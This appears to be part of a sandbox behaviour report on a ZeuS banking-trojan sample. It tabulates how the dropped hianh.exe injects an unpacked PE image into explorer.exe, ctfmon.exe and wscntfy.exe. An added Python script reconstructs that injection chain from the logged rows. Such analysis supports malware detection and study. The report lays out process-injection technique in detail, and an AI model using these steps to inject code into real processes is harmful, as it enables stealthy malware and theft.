| 1828 | C:\WINDOWS\system32\ctfmon.exe | A30000 | 12F850 | page execute and read and write | success or wait | 1 | 41A5F6 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | B53000 | 12F5FC | page read and write | success or wait | 3 | 4019F1 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | AE0000 | 12F850 | page execute and read and write | success or wait | 1 | 41A5F6 |
| 1960 | C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe | BF0000 | 12F850 | page execute and read and write | success or wait | 1 | 41A5F6 |
+ Memory attributes changed
| PID | Filepath | Base | Length | New Protection | Old Protection | Completion | Count | Source Address |
|---|---|---|---|---|---|---|---|---|
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 400000 | 1000 | page read and write | page readonly | success or wait | 1 | 4416D8 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 400000 | 1000 | page readonly | page read and write | success or wait | 1 | 4416ED |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 400000 | 27000 | page execute and read and write | page execute and read and write | success or wait | 1 | 3B0F37 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 400000 | 1000 | page readonly | page execute and read and write | success or wait | 1 | 3B1199 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 401000 | 21000 | page execute read | page execute and read and write | success or wait | 1 | 3B1217 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 422000 | 3000 | page read and write | page execute and read and write | success or wait | 1 | 3B1217 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 425000 | 2000 | page readonly | page execute and read and write | success or wait | 1 | 3B1217 |
| 1636 | C:\WINDOWS\explorer.exe | 1F70000 | 27000 | page execute and read and write | page execute and read and write | success or wait | 2 | 41A688 |
| 1636 | C:\WINDOWS\explorer.exe | 1F92D50 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 414C88 |
| 1636 | C:\WINDOWS\explorer.exe | 1F92000 | 1000 | page execute and read and write | page execute and read and write | success or wait | 2 | 414C88 |
| 1636 | C:\WINDOWS\explorer.exe | 1F92D64 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 414CA8 |
| 1636 | C:\WINDOWS\explorer.exe | 1F93214 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 41442D |
| 1636 | C:\WINDOWS\explorer.exe | 1F93000 | 1000 | page execute and read and write | page execute and read and write | success or wait | 2 | 41442D |
| 1636 | C:\WINDOWS\explorer.exe | 1F93218 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 41442D |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A30000 | 27000 | page execute and read and write | page execute and read and write | success or wait | 2 | 41A688 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A52D50 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 414C88 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A52000 | 1000 | page execute and read and write | page execute and read and write | success or wait | 2 | 414C88 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A52D64 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 414CA8 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A53214 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 41442D |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A53000 | 1000 | page execute and read and write | page execute and read and write | success or wait | 2 | 41442D |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A53218 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 41442D |
| 236 | C:\WINDOWS\system32\wscntfy.exe | AE0000 | 27000 | page execute and read and write | page execute and read and write | success or wait | 2 | 41A688 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B02D50 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 414C88 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B02000 | 1000 | page execute and read and write | page execute and read and write | success or wait | 2 | 414C88 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B02D64 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 414CA8 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B03214 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 41442D |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B03000 | 1000 | page execute and read and write | page execute and read and write | success or wait | 2 | 41442D |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B03218 | 1000 | page execute and read and write | page execute and read and write | success or wait | 1 | 41442D |
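Read together, the Thread and Memory tables above record one injection per target process: an RWX allocation (Memory allocated), a 159744-byte (0x27000) write that begins with a PE header whose DOS header holds nothing but the MZ signature and e_lfanew (Memory written), four 4-byte writes into that fresh image, and a thread started in the target at 7C8106F9, which lies inside the kernel32.dll mapping (7C800000, 1007616 bytes) from the Section table. The same 0x27000 size is what hianh.exe re-protects at its own 400000 (Memory attributes changed, with the .text-style 401000/21000 execute read split), so the image written into the targets is the unpacked module. The following added example, not part of the Joebox report, rebuilds that chain from the rows (the cmd.exe rows come from the first process's chronological view); the 4-byte value written at image+0x22D64 equals the remote image base in every target (00 00 F7 01 for 1F70000, and so on), which the example checks, and reading that write as the module storing its own base is this example's inference rather than something the report states.

```python
"""Rebuild the injection chain from the report's Memory and Thread tables.

Added example, not part of the Joebox report. Every row below is copied
from the report; the PE dump is rebuilt by offset from the bytes the
report shows. Reading the 4-byte write at image+0x22D64 as "the module's
own base, stored for the remote copy" is this example's inference.
"""
from __future__ import annotations

import struct
from datetime import datetime, timezone

# kernel32.dll mapping from the "Section loaded by Windows" table.
KERNEL32_BASE, KERNEL32_SIZE = 0x7C800000, 1007616


def hx(s: str) -> bytes:
    """Space-separated hex as the report prints it -> bytes."""
    return bytes.fromhex("".join(s.split()))


# Start of the 159744-byte image written into each target: MZ + e_lfanew
# only (the rest of the DOS header and stub are zero), then the PE header.
INJECTED_PE = hx(
    "4D 5A" + " 00" * 58 + " D8 00 00 00" + " 00" * 152
    + " 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01"
    + " 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00")

# "Memory written" rows: (pid, image, base, length, value).
WRITES = [
    (1636, "explorer.exe", 0x1F70000, 159744, INJECTED_PE),
    (1636, "explorer.exe", 0x1F92D64, 4, hx("00 00 F7 01")),
    (1828, "ctfmon.exe", 0xA30000, 159744, INJECTED_PE),
    (1828, "ctfmon.exe", 0xA52D64, 4, hx("00 00 A3 00")),
    (236, "wscntfy.exe", 0xAE0000, 159744, INJECTED_PE),
    (236, "wscntfy.exe", 0xB02D64, 4, hx("00 00 AE 00")),
    (2536, "cmd.exe", 0x140000, 159744, INJECTED_PE),
    (2536, "cmd.exe", 0x162D64, 4, hx("00 00 14 00")),
]

# "Thread created" rows: (tid, pid, eip, injected).
THREADS = [
    (4008, 1636, 0x7C8106F9, True),
    (1656, 1828, 0x7C8106F9, True),
    (2512, 236, 0x7C8106F9, True),
    (2544, 1960, 0x7C8106F9, True),
]


def parse_pe(blob: bytes) -> dict:
    """The header fields an analyst triages first, from a raw in-memory PE."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp.
    machine, nsect, stamp = struct.unpack_from("<HHI", blob, e_lfanew + 4)
    # Optional header Magic sits right after the 20-byte COFF header.
    magic = struct.unpack_from("<H", blob, e_lfanew + 24)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,  # 0x14C = i386
        "sections": nsect,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "pe32plus": magic == 0x20B,
        # A zeroed DOS stub is a hint the image was built for in-memory loading.
        "dos_stub_present": any(blob[0x40:e_lfanew]),
    }


def image_writes() -> dict[int, int]:
    """PID -> base of the full-image write (the injected module's base)."""
    return {pid: base for pid, _, base, length, _ in WRITES if length > 0x1000}


def base_patch_ok(pid: int, offset: int = 0x22D64) -> bool:
    """True if the 4-byte write at image+offset holds that image's own base."""
    base = image_writes()[pid]
    for wpid, _, addr, length, value in WRITES:
        if wpid == pid and length == 4 and addr == base + offset:
            return struct.unpack("<I", value)[0] == base
    return False


def remote_threads_in_kernel32() -> list[int]:
    """PIDs given an injected thread whose start address lies in kernel32."""
    lo, hi = KERNEL32_BASE, KERNEL32_BASE + KERNEL32_SIZE
    return [pid for _, pid, eip, injected in THREADS if injected and lo <= eip < hi]


def summary() -> dict[int, dict]:
    """Per-target view of the chain: image base, base patch, remote thread."""
    stamp = parse_pe(INJECTED_PE)["timestamp"]
    threaded = set(remote_threads_in_kernel32())
    return {pid: {"image_base": hex(base), "base_patch_ok": base_patch_ok(pid),
                  "remote_thread": pid in threaded, "compiled": stamp.isoformat()}
            for pid, base in image_writes().items()}


if __name__ == "__main__":
    for pid, facts in summary().items():
        print(pid, facts)
```

Two things fall out that the tables do not state directly: the injected module carries a Machine of 0x14C, three sections and a link timestamp in July 2011, and cmd.exe (PID 2536) gets the image and the base patch but no thread in the Thread table, which only covers the targets of hianh.exe; the 1960 target is the reverse, a thread and an allocation but no write shown.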
System Activities:
+ System information queried
| System info class | Completion | Count | Source Address |
|---|---|---|---|
| ProcessInformation | success or wait | 2 | 4053A6 |
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1978161742
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1978165537
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 1978169171
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1978170536
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1978171661
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 1978172418
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1978173871
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1978174237
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1978176773
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 1978179665
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 1978185194
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 1978186610
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 1978190065
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1978194378
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1978203737
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 1978210804
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1978222644
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1978225503
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 1978227817
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 1978242582
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 1978279772
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 1978280122
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 380000 Length: 12FF1C Allocation Type: null Protection: page read and write success or wait 1978280864
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 380000 Length: 12FF20 Allocation Type: null Protection: page read and write success or wait 1978281130
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 381000 Length: 12FBFC Allocation Type: null Protection: page read and write success or wait 1978281444
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 390000 Length: 12FEA4 Allocation Type: null Protection: page execute and read and write success or wait 1978283201
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 390000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1978283472
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 3B0000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1978284452
File opened Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1981476670
File read Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Offset: none Length: 5 Value: 31 36 37 39 30 success or wait 1981477059
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 12FD60 Allocation Type: null Protection: page execute and read and write success or wait 1981497173
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1981497276
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 1981506475
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 1981508730
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 930000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 1981512860
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 930000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 1981529056
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 1981530061
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1981533876
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1981535006
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1981535904
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 1981548121
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 1981552755
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 1981557163
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1981557750
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 1981563867
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1981564789
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 1981568282
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1981568859
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1981570070
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1981570662
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1981574731
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 440000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1981576997
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1981579577
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1981582870
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 1981627859
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1981628441
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page execute and read and write success or wait 1981630534
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 401000 Length: 21000 New Protection: page execute read New Protection: page execute and read and write success or wait 1981630640
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 422000 Length: 3000 New Protection: page read and write New Protection: page execute and read and write success or wait 1981630853
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 425000 Length: 2000 New Protection: page readonly New Protection: page execute and read and write success or wait 1981630954
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B50000 Length: 12F910 Allocation Type: null Protection: page read and write success or wait 1981631185
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B50000 Length: 12F914 Allocation Type: null Protection: page read and write success or wait 1981631284
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 181000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1981634393
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 182000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1981639226
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 183000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1981643080
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 184000 Length: 12F628 Allocation Type: null Protection: page read and write success or wait 1981653669
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1981666386
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: BD0000 Length: 12FAEC Allocation Type: null Protection: page read and write success or wait 1981666728
File read Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1981666828
Mutant created Name: \BaseNamedObjects\Local\{70C7FA5B-C2C6-5FB1-185B-81F8EE8A3A3D} success or wait 1981809435
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Okmaykid object name not found 1981809652
System info queried Type: ProcessInformation success or wait 1981809948
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 1981812632
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 1981813497
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 1981813863
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 1981814198
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 1981814529
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 1981814854
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 1981815181
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 1981815521
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 1981815863
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 1981816202
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 1981816542
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 1981816877
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 1981817217
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A256-CCC354877706} success or wait 1981817561
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 1981817755
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1981818577
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1981818697
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1986693326
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986693727
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986693849
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D50 Length: 4 Value: 00 00 00 00 success or wait 1986707393
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986707685
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986708117
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D64 Length: 4 Value: 00 00 F7 01 success or wait 1986759335
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986760172
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986760470
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93214 Length: 4 Value: C0 02 00 00 success or wait 1986772738
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986773069
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986773367
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93218 Length: 4 Value: 90 02 00 00 success or wait 1986816109
Thread created PID: 1636 TID: 4008 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: true success or wait 1986856572
Thread resumed TID: 4008 PID: 1636 Path: C:\WINDOWS\explorer.exe success or wait 1986857468
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} success or wait 1997271367
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 1997271938
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B53000 Length: 12F5FC Allocation Type: null Protection: page read and write success or wait 1997272284
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1997273931
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1997274249
